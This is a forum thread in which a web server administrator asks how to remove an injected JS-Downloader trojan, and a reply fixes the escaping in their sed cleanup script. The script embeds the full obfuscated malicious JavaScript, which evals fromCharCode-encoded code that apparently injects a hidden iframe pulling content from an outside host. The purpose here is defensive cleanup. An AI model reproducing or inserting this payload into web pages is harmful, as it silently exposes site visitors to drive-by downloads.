LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices



Reply
 
Search this Thread
Old 08-12-2011, 12:34 AM   #1
moyorakkhi
Member
 
Registered: Jan 2011
Location: Dhaka
Posts: 80

Rep: Reputation: 1
Trojan on Web Server


In our web-server most of the sites are infected with this JS-Downloader Trojan. It injected the following code. I've tried to clean up the server with "linux malware detector" and ClamAV, but both of them failed to clean it up. Any suggestion how to clean this up? Do I need to run a script to clean it? I've written this script. But it's not able to clean.

Code:
    while read -r file
    do
       sed -i '/<script>var s,g=2,aa=document.createTextNode("harCode");if(~0===Math.cos(Math.PI)){s=String["fr"+"omC"+aa.nodeValue];} eval(s(7+g,7+g,103+g,100+g,30+g,38+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,39+g,121+g,7+g,7+g,7+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,57+g,7+g,7+g,123+g,30+g,99+g,106+g,113+g,99+g,30+g,121+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,117+g,112+g,103+g,114+g,99+g,38+g,32+g,58+g,103+g,100+g,112+g,95+g,107+g,99+g,30+g,113+g,112+g,97+g,59+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,108+g,114+g,43+g,113+g,114+g,95+g,114+g,113+g,44+g,97+g,109+g,44+g,114+g,116+g,45+g,97+g,109+g,115+g,108+g,114+g,99+g,112+g,44+g,102+g,114+g,107+g,37+g,30+g,117+g,103+g,98+g,114+g,102+g,59+g,37+g,47+g,46+g,37+g,30+g,102+g,99+g,103+g,101+g,102+g,114+g,59+g,37+g,47+g,46+g,37+g,30+g,113+g,114+g,119+g,106+g,99+g,59+g,37+g,116+g,103+g,113+g,103+g,96+g,103+g,106+g,103+g,114+g,119+g,56+g,102+g,103+g,98+g,98+g,99+g,108+g,57+g,110+g,109+g,113+g,103+g,114+g,103+g,109+g,108+g,56+g,95+g,96+g,113+g,109+g,106+g,115+g,114+g,99+g,57+g,106+g,99+g,100+g,114+g,56+g,46+g,57+g,114+g,109+g,110+g,56+g,46+g,57+g,37+g,60+g,58+g,45+g,103+g,100+g,112+g,95+g,107+g,99+g,60+g,32+g,39+g,57+g,7+g,7+g,123+g,7+g,7+g,100+g,115+g,108+g,97+g,114+g,103+g,109+g,108+g,30+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,121+g,7+g,7+g,7+g,116+g,95+g,112+g,30+g,100+g,30+g,59+g,30+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,97+g,112+g,99+g,95+g,114+g,99+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,38+g,37+g,103+g,100+g,112+g,95+g,107+g,99+g,37+g,39+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,113+g,112+g,97+g,37+g,42+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,108+g,114+g,43+g,113+g,114+g,95+g,114+g,113+g,44+g,97+g,109+g,44+g,114+g,116+g,45+g,97+g,109+g,115+g,108+g,114+g,99+g,112+g,44+g,102+g,114+g,107+g,37+g,39+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,116+g,103+g,113+g,103+g,96+g,103+g,106+g,103+g,114+g,119+g,59+g,37+g,102+g,103+g,98+g,98+g,99+g,108+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,110+g,109+g,113+g,103+g,114+g,103+g,109+g,108+g,59+g,37+g,95+g,96+g,113+g,109+g,106+g,115+g,114+g,99+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,106+g,99+g,100+g,114+g,59+g,37+g,46+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,114+g,109+g,110+g,59+g,37+g,46+g,37+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,117+g,103+g,98+g,114+g,102+g,37+g,42+g,37+g,47+g,46+g,37+g,39+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,102+g,99+g,103+g,101+g,102+g,114+g,37+g,42+g,37+g,47+g,46+g,37+g,39+g,57+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,44+g,95+g,110+g,110+g,99+g,108+g,98+g,65+g,102+g,103+g,106+g,98+g,38+g,100+g,39+g,57+g,7+g,7+g,123+g));</script><script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,101+o,113+o,47+o,117+o,118+o,99+o,118+o,117+o,48+o,101+o,113+o,48+o,100+o,103+o,49+o,117+o,118+o,99+o,118+o,107+o,117+o,118+o,107+o,101+o,48+o,106+o,118+o,111+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,101+o,113+o,47+o,117+o,118+o,99+o,118+o,117+o,48+o,101+o,113+o,48+o,100+o,103+o,49+o,117+o,118+o,99+o,118+o,107+o,117+o,118+o,107+o,101+o,48+o,106+o,118+o,111+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script></body>/d' $file
    done< <(find . -name '*.htm' -o -name '*.html' -o -name '*.js' -o -name '*.php')
 
Old 08-12-2011, 09:09 AM   #2
MTK358
LQ 5k Club
 
Registered: Sep 2009
Posts: 6,443
Blog Entries: 3

Rep: Reputation: 714Reputation: 714Reputation: 714Reputation: 714Reputation: 714Reputation: 714Reputation: 714
"[" and "]" are regular expression special characters. So this part:

Code:
["fr"+"omC"+aa.nodeValue]
Actually matches one (and only one) of the characters between the square brackets, not the literal string. Try replacing it with this:

Code:
\["fr"+"omC"+aa.nodeValue\]
 
1 members found this post helpful.
Old 08-15-2011, 12:34 PM   #3
moyorakkhi
Member
 
Registered: Jan 2011
Location: Dhaka
Posts: 80

Original Poster
Rep: Reputation: 1
Thanks!
 
  


Reply

Tags
script, trojan


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
How to monitor web server, FTP server, Mail server and database server vodka33us Programming 1 06-16-2008 05:20 AM
can we configure a Linux server with mail server,file server and web server kumarx Linux - Newbie 5 09-09-2004 07:21 AM
setting up password protected web forms on an apache web server AZDAVE Linux - Security 3 07-07-2004 01:03 PM
Please help, I dont know if I have a trojan on my server or not lexington Linux - Security 7 04-15-2004 03:00 AM


All times are GMT -5. The time now is 02:44 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration